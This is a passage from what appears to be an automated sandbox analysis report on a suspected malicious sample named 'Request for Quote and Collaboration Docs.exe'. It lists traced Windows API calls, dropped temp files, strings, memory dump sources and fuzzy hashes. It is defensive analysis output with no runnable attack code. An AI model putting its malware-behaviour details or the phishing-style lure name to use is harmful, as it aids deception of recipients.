                                                                                            • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,76F8FFC0,100011AA,?,00000000), ref: 1000131E
                                                                                          • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                          • String ID: s<u
                                                                                          • API String ID: 2435812281-779365171
                                                                                          • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                          • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                          • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                          • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                          APIs
                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061E1
                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061F5
                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00406208
                                                                                          Strings
                                                                                          • *?|<>/":, xrefs: 004061D0
                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040617F, 00406184
                                                                                          • "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe", xrefs: 004061C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$Prev
                                                                                          • String ID: "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                          • API String ID: 589700163-2159311123
                                                                                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                          • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                          • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp$C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll
                                                                                          • API String ID: 1453599865-945423321
                                                                                          • Opcode ID: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                          • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                          • Opcode Fuzzy Hash: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                          • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                          • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                          • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                          • GetSysColor.USER32(?), ref: 004041FA
                                                                                          • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                          • DeleteObject.GDI32(?), ref: 00404224
                                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2320649405-0
                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                          • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                          • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3294113728-0
                                                                                          • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                          • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                          • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                          • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                          • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                          • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 2531174081-0
                                                                                          • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                          • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                          • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                          • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(00034B57,00000064,0003711F), ref: 00402D13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                          • String ID: ... %d%%
                                                                                          • API String ID: 722711167-2449383134
                                                                                          • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                          • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                          • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                          • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                          • GetMessagePos.USER32 ref: 00404A81
                                                                                          • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Send$ClientScreen
                                                                                          • String ID: f
                                                                                          • API String ID: 41195575-1993550816
                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                          • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                          • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                          APIs
                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                          • API String ID: 1451636040-1158693248
                                                                                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                          • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                          • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 3579998418-0
                                                                                          • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                          • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                          • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                          • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                          APIs
                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                          • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                          • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                          • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeGlobal$lstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 176019282-0
                                                                                          • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                          • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                          • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                          • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
